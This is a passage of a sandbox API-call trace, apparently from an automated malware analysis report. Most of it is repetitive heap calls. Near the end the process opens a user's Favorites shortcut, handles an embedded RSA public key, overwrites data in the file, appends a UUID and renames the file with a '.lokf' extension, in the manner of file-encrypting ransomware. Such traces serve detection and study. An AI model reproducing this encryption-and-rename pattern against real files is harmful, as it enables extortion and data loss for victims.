returned 0x9c5d1d0 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0059.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0059.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.780] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.780] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.780] PathFindFileNameW (pszPath="") returned="" [0059.780] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.781] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.781] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.781] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0059.781] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned=".url" [0059.781] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.782] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.782] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.785] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.785] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.786] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.786] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.786] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.786] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.786] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.786] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.786] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.786] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.786] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.787] GetLastError () returned 0x0 [0059.789] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.789] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.789] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.789] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.789] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.789] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.789] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.789] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.789] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.789] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.790] CloseHandle (hObject=0x5cc) returned 1 [0059.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0059.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.790] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0059.790] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.lokf")) returned 1 [0059.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.791] HeapFree 